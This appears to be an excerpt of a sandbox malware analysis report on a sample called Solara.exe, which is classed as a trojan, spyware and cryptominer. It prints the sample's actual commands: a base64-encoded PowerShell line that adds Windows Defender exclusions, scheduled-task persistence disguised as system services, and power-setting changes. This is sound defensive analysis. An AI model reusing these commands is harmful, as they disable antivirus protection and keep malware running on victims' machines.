                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009312B02_2_009312B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00937AB02_2_00937AB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E7AA02_2_008E7AA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00908AA02_2_00908AA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E82B02_2_008E82B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009422CA2_2_009422CA
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009022F02_2_009022F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009322102_2_00932210
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F32002_2_008F3200
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00921A002_2_00921A00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009482302_2_00948230
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00933A202_2_00933A20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00903A502_2_00903A50
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D72402_2_008D7240
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00918A702_2_00918A70
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008EDB802_2_008EDB80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E0B902_2_008E0B90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00927BB02_2_00927BB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E1BA02_2_008E1BA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008EE3A02_2_008EE3A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009053A02_2_009053A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009193D02_2_009193D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009393E02_2_009393E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008FABF02_2_008FABF0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DA3002_2_008DA300
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D7B002_2_008D7B00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D83102_2_008D8310
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008EB3102_2_008EB310
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F73202_2_008F7320
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009113202_2_00911320
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0091A3502_2_0091A350
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009203502_2_00920350
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0091EB402_2_0091EB40
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E7B502_2_008E7B50
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F93602_2_008F9360
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00914CB02_2_00914CB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0092BCC02_2_0092BCC0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009284C02_2_009284C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0093A4C02_2_0093A4C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D54D02_2_008D54D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009034102_2_00903410
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F2C002_2_008F2C00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00931C002_2_00931C00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E4C102_2_008E4C10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008ED4102_2_008ED410
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009234302_2_00923430
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E44302_2_008E4430
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E04302_2_008E0430
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E24502_2_008E2450
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F54502_2_008F5450
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00903C702_2_00903C70
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009164602_2_00916460
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008EEC702_2_008EEC70
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009555922_2_00955592
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F2D802_2_008F2D80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0090C5A02_2_0090C5A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0090F5D02_2_0090F5D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00907DD02_2_00907DD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F55C02_2_008F55C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D8DD02_2_008D8DD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00917DF02_2_00917DF0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E0DE02_2_008E0DE0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F9D002_2_008F9D00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0092FD002_2_0092FD00
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009295002_2_00929500
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E35102_2_008E3510
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0090FD202_2_0090FD20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D9D302_2_008D9D30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E65302_2_008E6530
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F35302_2_008F3530
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DCD502_2_008DCD50
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0090B5602_2_0090B560
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00933D602_2_00933D60
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009256902_2_00925690
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00912E802_2_00912E80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D96902_2_008D9690
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DE6902_2_008DE690
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00913EA02_2_00913EA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D16B02_2_008D16B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F5EB02_2_008F5EB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E76C02_2_008E76C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0090AEC02_2_0090AEC0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0090D6E02_2_0090D6E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009086E02_2_009086E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0091AEE02_2_0091AEE0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DB6F02_2_008DB6F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F66F02_2_008F66F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00937E102_2_00937E10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DC6102_2_008DC610
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F0E102_2_008F0E10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E06202_2_008E0620
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008FFE202_2_008FFE20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009196502_2_00919650
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009346402_2_00934640
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DDE602_2_008DDE60
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00939E602_2_00939E60
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00916F902_2_00916F90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0092FF902_2_0092FF90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F6FC02_2_008F6FC0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00922FC02_2_00922FC0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009207F02_2_009207F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008D27E02_2_008D27E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_009537182_2_00953718
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008DBF102_2_008DBF10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F2F102_2_008F2F10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E3F202_2_008E3F20
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008E97402_2_008E9740
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008F1F502_2_008F1F50
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeCode function: 8_2_0155F2E48_2_0155F2E4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0513B57011_2_0513B570
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0513B55011_2_0513B550
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08E53E9811_2_08E53E98
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Dllhost\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: String function: 0041ACC0 appears 85 times
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: String function: 0094607C appears 44 times
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: String function: 0094AE24 appears 34 times
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: String function: 0040B1D0 appears 47 times
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: String function: 0093DE10 appears 96 times
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 400
                  Source: winlogson.exe.8.drStatic PE information: Number of sections : 11 > 10
                  Source: winlogson.exe.8.drStatic PE information: No import functions for PE file found
                  Source: winlogson.exe.8.drStatic PE information: Data appended to the last section found
                  Source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs Solara.exe.bin.exe
                  Source: Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs Solara.exe.bin.exe
                  Source: Solara.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Solara.exe.bin.exeStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
                  Source: Solara.exe.bin.exeStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
                  Source: WinRing0x64.sys.8.drBinary string: \Device\WinRing0_1_2_0
                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@26/21@2/4
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00442800 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00442800
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1764:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeMutant created: \Sessions\1\BaseNamedObjects\ProgramV3
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6856
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeJump to behavior
                  Source: Solara.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Solara.exe.bin.exe, 00000002.00000003.932677884.0000000001263000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.945284581.0000000001285000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.945076012.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.932274143.00000000035F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Solara.exe.bin.exeVirustotal: Detection: 76%
                  Source: Solara.exe.bin.exeReversingLabs: Detection: 76%
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile read: C:\Users\user\Desktop\Solara.exe.bin.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Solara.exe.bin.exe "C:\Users\user\Desktop\Solara.exe.bin.exe"
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess created: C:\Users\user\Desktop\Solara.exe.bin.exe "C:\Users\user\Desktop\Solara.exe.bin.exe"
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 400
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA="
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess created: C:\Users\user\Desktop\Solara.exe.bin.exe "C:\Users\user\Desktop\Solara.exe.bin.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe "C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate offJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: wldp.dllJump to behavior
